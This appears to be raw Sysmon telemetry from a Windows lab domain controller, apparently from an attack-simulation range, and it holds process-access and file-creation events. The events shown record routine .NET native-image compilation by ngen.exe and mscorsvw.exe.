13:21:58.008{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4576-6000-2002-000000009A01}3544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006223Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.008{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4576-6000-2002-000000009A01}3544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006255Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:59.993{08A6967A-4577-6000-2902-000000009A01}4560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11d0-0\PresentationFramework-SystemData.dll2021-01-14 13:21:59.993 10341000x80000000000000006254Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:59.946{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4577-6000-2902-000000009A01}4560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006253Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:59.930{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4577-6000-2902-000000009A01}4560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006252Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:59.930{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4577-6000-2902-000000009A01}4560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006251Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:59.883{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4577-6000-2802-000000009A01}4892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006250Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:59.868{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4577-6000-2802-000000009A01}4892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006249Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:59.868{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4577-6000-2802-000000009A01}4892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006248Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:59.821{08A6967A-4577-6000-2702-000000009A01}3148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c4c-0\PresentationFramework-SystemCore.dll2021-01-14 13:21:59.821 10341000x80000000000000006247Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:59.696{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4577-6000-2702-000000009A01}3148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006246Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:59.680{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4577-6000-2702-000000009A01}3148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006245Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:59.680{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4577-6000-2702-000000009A01}3148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006244Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:59.540{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4577-6000-2602-000000009A01}1392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006243Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:59.524{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4577-6000-2602-000000009A01}1392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006242Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:59.524{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4577-6000-2602-000000009A01}1392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006241Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:59.430{08A6967A-4576-6000-2502-000000009A01}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1254-0\PresentationBuildTasks.dll2021-01-14 13:21:59.430 10341000x80000000000000006282Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.649{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4578-6000-3102-000000009A01}2192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006281Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.633{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4578-6000-3102-000000009A01}2192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006280Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.633{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4578-6000-3102-000000009A01}2192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006279Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.587{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4578-6000-3002-000000009A01}724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006278Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.571{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4578-6000-3002-000000009A01}724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006277Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.571{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4578-6000-3002-000000009A01}724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006276Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:00.524{08A6967A-4578-6000-2F02-000000009A01}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1308-0\PresentationFramework-SystemXmlLinq.dll2021-01-14 13:22:00.524 10341000x80000000000000006275Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.477{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4578-6000-2F02-000000009A01}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006274Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.462{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4578-6000-2F02-000000009A01}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006273Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.462{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4578-6000-2F02-000000009A01}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006272Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.430{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4578-6000-2E02-000000009A01}980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006271Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.415{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4578-6000-2E02-000000009A01}980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006270Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 